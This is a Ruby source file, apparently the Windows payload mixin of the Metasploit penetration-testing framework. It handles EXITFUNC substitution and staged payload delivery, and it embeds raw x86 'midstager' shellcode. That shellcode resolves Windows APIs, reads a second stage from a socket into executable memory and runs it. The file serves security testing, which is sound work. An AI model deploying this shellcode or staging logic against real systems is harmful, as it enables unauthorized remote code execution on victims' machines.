# -*- coding: binary -*- require 'msf/core' ### # # This class is here to implement advanced variable substitution # for windows-based payloads, such as EXITFUNC. Windows payloads # are expected to include this module if they want advanced # variable substitution. # ### module Msf::Payload::Windows require 'msf/core/payload/windows/prepend_migrate' # Provides the #prepends method # XXX: For some unfathomable reason, the order of requires here is # important. If this include happens after require'ing the files # below, it causes the windows/exec payload (and probably others) to # somehow not have PrependMigrate despite having Payload::Windows, # which leads to a NoMethodError on #prepends include Msf::Payload::Windows::PrependMigrate require 'msf/core/payload/windows/dllinject' require 'msf/core/payload/windows/exec' require 'msf/core/payload/windows/loadlibrary' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/core/payload/windows/x64/meterpreter_loader' require 'msf/core/payload/windows/reflectivedllinject' require 'msf/core/payload/windows/x64/reflectivedllinject' # # ROR hash associations for some of the exit technique routines. # @@exit_types = { nil => 0, # Default to nothing '' => 0, # Default to nothing 'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter 'thread' => 0x0A2A1DE0, # ExitThread 'process' => 0x56A2B5F0, # ExitProcess 'none' => 0x5DE2C5AA # GetLastError } # # Implement payload prepends for Windows payloads # def apply_prepends(raw) apply_prepend_migrate(raw) end # # This mixin is chained within payloads that target the Windows platform. # It provides special variable substitution for things like EXITFUNC and # automatically adds it as a required option for exploits that use windows # payloads. It also provides the migrate prepend. # def initialize(info = {}) ret = super( info ) # All windows payload hint that the stack must be aligned to nop # generators and encoders. if( info['Arch'] == ARCH_X64 ) if( info['Alias'] ) info['Alias'] = 'windows/x64/' + info['Alias'] end merge_info( info, 'SaveRegisters' => [ 'rsp' ] ) elsif( info['Arch'] == ARCH_X86 ) if( info['Alias'] ) info['Alias'] = 'windows/' + info['Alias'] end merge_info( info, 'SaveRegisters' => [ 'esp' ] ) end #if (info['Alias']) # info['Alias'] = 'windows/' + info['Alias'] #end acceptable_exit_types = @@exit_types.keys.collect { |e| e.blank? ? "''" : e }.uniq register_options( [ Msf::OptEnum.new('EXITFUNC', [true, 'Exit technique', 'process', acceptable_exit_types]) ], Msf::Payload::Windows ) ret end # # Replace the EXITFUNC variable like madness # def replace_var(raw, name, offset, pack) if (name == 'EXITFUNC') method = datastore[name] method = 'thread' if (!method or @@exit_types.include?(method) == false) raw[offset, 4] = [ @@exit_types[method] ].pack(pack || 'V') return true end return false end # # For windows, we check to see if the stage that is being sent is larger # than a certain size. If it is, we transmit another stager that will # ensure that the entire stage is read in. # def handle_intermediate_stage(conn, payload) if( self.module_info['Stager']['RequiresMidstager'] == false ) conn.put( [ payload.length ].pack('V') ) # returning false allows stager.rb!handle_connection() to prepend the stage_prefix if needed return false end return false if (payload.length < 512) # The mid-stage works by reading in a four byte length in host-byte # order (which represents the length of the stage). Following that, it # reads in the entire second stage until all bytes are read. It reads the # data into a buffer which is allocated with VirtualAlloc to avoid running # out of stack space or NX problems. # See the source file: /external/source/shellcode/windows/midstager.asm midstager = "\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" + "\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" + "\xff\xff\x8b\x6a\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c\x0d\x1c" + "\x01\xe9\x8b\x71\x3c\x01\xee\x60\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b" + "\x5b\x14\x8b\x73\x28\x6a\x18\x59\x31\xff\x31\xc0\xac\x3c\x61\x7c" + "\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81\xff\x5b\xbc\x4a\x6a" + "\x8b\x6b\x10\x8b\x1b\x75\xdb\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef" + "\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0" + "\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x81\xfa\x54" + "\xca\xaf\x91\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f" + "\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x08\x61\x89\xe3\x6a" + "\x00\x6a\x04\x53\x57\xff\xd6\x8b\x1b\x6a\x40\x68\x00\x30\x00\x00" + "\x53\x6a\x00\xff\xd5\x89\xc5\x55\x6a\x00\x53\x55\x57\xff\xd6\x01" + "\xc5\x29\xc3\x85\xdb\x75\xf1\xc3" # Prepend the stage prefix as necessary, such as a tag that is needed to # find the socket midstager = (self.stage_prefix || '') + midstager print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)") # Transmit our intermediate stager conn.put(midstager) # Sleep to give enough time for the remote side to receive and read the # midstage so that we don't accidentally read in part of the second # stage. Rex::ThreadSafe.sleep(1.5) # The mid-stage requires that we transmit a four byte length field that # it will use as the length of the subsequent stage. conn.put([ payload.length ].pack('V')) return true end # # Share the EXITFUNC mappings with other classes # def self.exit_types @@exit_types.dup end # # By default, we don't want to send the UUID, but we'll send # for certain payloads if requested. # def include_send_uuid false end end